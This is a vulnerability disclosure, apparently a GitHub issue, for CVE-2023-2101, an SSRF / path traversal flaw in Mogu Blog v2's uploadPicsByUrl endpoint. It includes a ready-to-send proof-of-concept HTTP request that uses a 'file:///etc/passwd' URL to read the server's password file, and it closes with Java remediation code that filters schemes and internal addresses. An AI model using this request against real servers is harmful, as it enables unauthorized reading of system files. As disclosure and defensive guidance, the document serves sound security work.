CVE-2023-2101: mogu_blog_v2 FileRestApi#uploadPicsByUrl has an SSRF vulnerability · Issue #97 · moxi624/mogu_blog_v2

A vulnerability, which was classified as problematic, has been found in moxi624 Mogu Blog v2 up to 5.2. This issue affects the function uploadPictureByUrl of the file /mogu-picture/file/uploadPicsByUrl. The manipulation of the argument urlList leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226109 was assigned to this vulnerability.


Construct a BurpSuite request that uses the file protocol to read the contents of /etc/passwd and write them into an image:

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122

{
    "token": "asdf",
    "adminUid": "asdf",
    "sortName": "admin",
    "projectName": "blog",
    "urlList": [
        "file:///etc/passwd"
    ]
}

Enter the uploadPictureByUrl() method:
The incoming fileV0 is the request parameter automatically bound by Spring Boot from the front end; urlList is taken out of fileV0.

Iterate over urlList and pass each entry into the uploadPictureByUrl() method, with no filtering in between:

Stepping further into the uploadPictureByUrl method:
No filtering is done in the uploadPictureByUrl method either; the value is passed directly into the URL class.

After openConnection is called, the data stream is read and written to the output stream:

(1) It is suggested to use the HttpURLConnection class instead of the Url class, and to check the IP address of the requested host, filtering out intranet IPs.
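One way to carry out suggestion (1), added here as an example and not code from mogu_blog_v2; the class SafeUrlFetcher and its methods are hypothetical names, and it assumes Java 9 or later for Set.of:

```java
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Set;

// Added example (hypothetical class, not mogu_blog_v2 code): replaces the bare
// new URL(url).openConnection() with a check of scheme and resolved address first.
public final class SafeUrlFetcher {
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    public static HttpURLConnection openSafely(String rawUrl) throws Exception {
        URL url;
        try {
            url = new URL(rawUrl);
        } catch (MalformedURLException e) {
            throw new IllegalArgumentException("malformed URL rejected");
        }
        // file:, jar:, ftp: and any other protocol handler never reach openConnection()
        if (!ALLOWED_SCHEMES.contains(url.getProtocol().toLowerCase())) {
            throw new IllegalArgumentException("scheme not allowed: " + url.getProtocol());
        }
        if (url.getHost() == null || url.getHost().isEmpty()) {
            throw new IllegalArgumentException("host required");
        }
        // Check every address the name resolves to, not only the first one
        for (InetAddress addr : InetAddress.getAllByName(url.getHost())) {
            if (isInternal(addr)) {
                throw new IllegalArgumentException("internal address rejected: " + addr.getHostAddress());
            }
        }
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        // Do not follow redirects: a public host could answer 302 to an internal address
        conn.setInstanceFollowRedirects(false);
        conn.setConnectTimeout(5000);
        conn.setReadTimeout(5000);
        return conn;
    }

    // Loopback, RFC 1918 / site-local, link-local (incl. 169.254.169.254), wildcard,
    // multicast, and IPv6 unique-local fc00::/7 (isSiteLocalAddress only matches fec0::/10).
    static boolean isInternal(InetAddress addr) {
        byte[] b = addr.getAddress();
        boolean uniqueLocalV6 = b.length == 16 && (b[0] & 0xfe) == 0xfc;
        return addr.isLoopbackAddress() || addr.isSiteLocalAddress()
                || addr.isLinkLocalAddress() || addr.isAnyLocalAddress()
                || addr.isMulticastAddress() || uniqueLocalV6;
    }
}
```

Resolving the name before connecting still leaves a DNS rebinding window, since the name may resolve differently when openConnection() actually connects; pinning the checked address into the connection, or validating at the socket layer, closes it.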
